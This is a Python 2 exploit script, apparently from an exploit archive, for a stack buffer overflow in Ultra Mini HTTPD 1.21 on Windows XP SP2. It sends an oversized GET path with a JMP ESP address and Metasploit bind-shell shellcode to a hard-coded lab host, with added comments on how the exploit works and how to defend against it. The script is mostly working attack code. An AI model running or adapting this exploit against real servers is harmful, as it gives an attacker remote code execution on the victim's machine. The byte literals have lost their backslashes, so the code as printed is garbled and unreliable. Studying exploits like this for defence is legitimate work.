
# Title : Ultra Mini HTTPD 1.21 - Stack Buffer Overflow
# Published : 2013-07-11
# Author :


# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description: 
# A buffer overflow is triggered when requesting a very long 
# resource name. 
#

import socket
import struct

# Proof-of-concept for the stack buffer overflow in Ultra Mini HTTPD 1.21
# described in the header: the path of a single GET request is padded far
# past the length the server expects, presumably overwriting the saved
# return address (the JMP ESP gadget below only makes sense in that case).
#
# Defender's notes, limited to what this listing shows:
#   - Trigger: one HTTP request whose request line is several kilobytes
#     long and dominated by a single repeated byte ("A" * 5392 below). A
#     request-line length limit at a proxy/WAF, or in the server itself,
#     stops this class of input before it is parsed.
#   - The overwrite depends on a fixed ntdll.dll address that the author
#     comment ties to the tested Windows XP SP2 build; on platforms with
#     ASLR/DEP this particular chain would be expected to fail.
#   - Python 2 script: `print` statement and a str payload handed straight
#     to socket.send().
#
# NOTE(review): every byte string on this page reads `x1f` rather than
# `\x1f`; the backslashes appear to have been lost in page extraction, so
# the literals as printed are plain ASCII text rather than the encoded
# bytes the msfencode comment describes, and len(payload) differs
# accordingly.

# msfpayload windows/shell_bind_tcp R | 
#     msfencode -b "x00x0ax0dx20x0bx09x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

# Encoded bind-shell payload produced by the Metasploit command above. The
# excluded bytes in the -b list are the ones an HTTP request line cannot
# carry (NUL, LF, CR, space, VT, tab, FF).
shellcode = ( 
"xbax1fxb5xaexa1xddxc4xd9x74x24xf4x5ex33xc9" +
"xb1x56x31x56x13x83xc6x04x03x56x10x57x5bx5d" +
"xc6x1exa4x9ex16x41x2cx7bx27x53x4ax0fx15x63" +
"x18x5dx95x08x4cx76x2ex7cx59x79x87xcbxbfxb4" +
"x18xfax7fx1axdax9cx03x61x0ex7fx3dxaax43x7e" +
"x7axd7xabxd2xd3x93x19xc3x50xe1xa1xe2xb6x6d" +
"x99x9cxb3xb2x6dx17xbdxe2xddx2cxf5x1ax56x6a" +
"x26x1axbbx68x1ax55xb0x5bxe8x64x10x92x11x57" +
"x5cx79x2cx57x51x83x68x50x89xf6x82xa2x34x01" +
"x51xd8xe2x84x44x7ax61x3exadx7axa6xd9x26x70" +
"x03xadx61x95x92x62x1axa1x1fx85xcdx23x5bxa2" +
"xc9x68x38xcbx48xd5xefxf4x8bxb1x50x51xc7x50" +
"x85xe3x8ax3cx6axdex34xbdxe4x69x46x8fxabxc1" +
"xc0xa3x24xccx17xc3x1fxa8x88x3ax9fxc9x81xf8" +
"xcbx99xb9x29x73x72x3axd5xa6xd5x6ax79x18x96" +
"xdax39xc8x7ex31xb6x37x9ex3ax1cx4ex98xf4x44" +
"x03x4fxf5x7axb2xd3x70x9cxdexfbxd4x36x76x3e" +
"x03x8fxe1x41x61xa3xbaxd5x3dxadx7cxd9xbdxfb" +
"x2fx76x15x6cxbbx94xa2x8dxbcxb0x82xc4x85x53" +
"x58xb9x44xc5x5dx90x3ex66xcfx7fxbexe1xecxd7" +
"xe9xa6xc3x21x7fx5bx7dx98x9dxa6x1bxe3x25x7d" +
"xd8xeaxa4xf0x64xc9xb6xccx65x55xe2x80x33x03" +
"x5cx67xeaxe5x36x31x41xacxdexc4xa9x6fx98xc8" +
"xe7x19x44x78x5ex5cx7bxb5x36x68x04xabxa6x97" +
"xdfx6fxd6xddx7dxd9x7fxb8x14x5bxe2x3bxc3x98" +
"x1bxb8xe1x60xd8xa0x80x65xa4x66x79x14xb5x02" +
"x7dx8bxb6x06"
)

# 7C941EED  , JMP ESP , ntdll.dll
# Overwrite layout: 5392 bytes of filler, then the gadget address packed
# little-endian ("<I"), so the JMP ESP lands execution on whatever
# follows on the stack.
payload =  "A" * 5392 + struct.pack("<I", 0x7C941EED)
# Six bytes ahead of the shellcode (presumably a stack-pointer adjustment
# so the decoder does not overwrite itself -- not verified here), then the
# encoded shellcode, then "B" padding.
payload += "x81xc4xf0xeaxffxff" + shellcode + "B" * 4230

print "[+] sending payload, length", len(payload)

# Hard-coded lab address carried over from the original write-up.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.175", 80))

# The whole payload travels in the request path of one GET. The "rn"
# fragments are the "\r\n" line terminators with backslashes stripped
# (see the extraction note at the top).
buf = (
	"GET /" + payload + " HTTP/1.1rn" + 
	"Host: 192.168.37.175" + 
	"rnrn"
)

# Fire-and-forget: the return value of send() is not checked and no
# response is read, so the outcome is only observable on the target side.
s.send(buf)
s.close()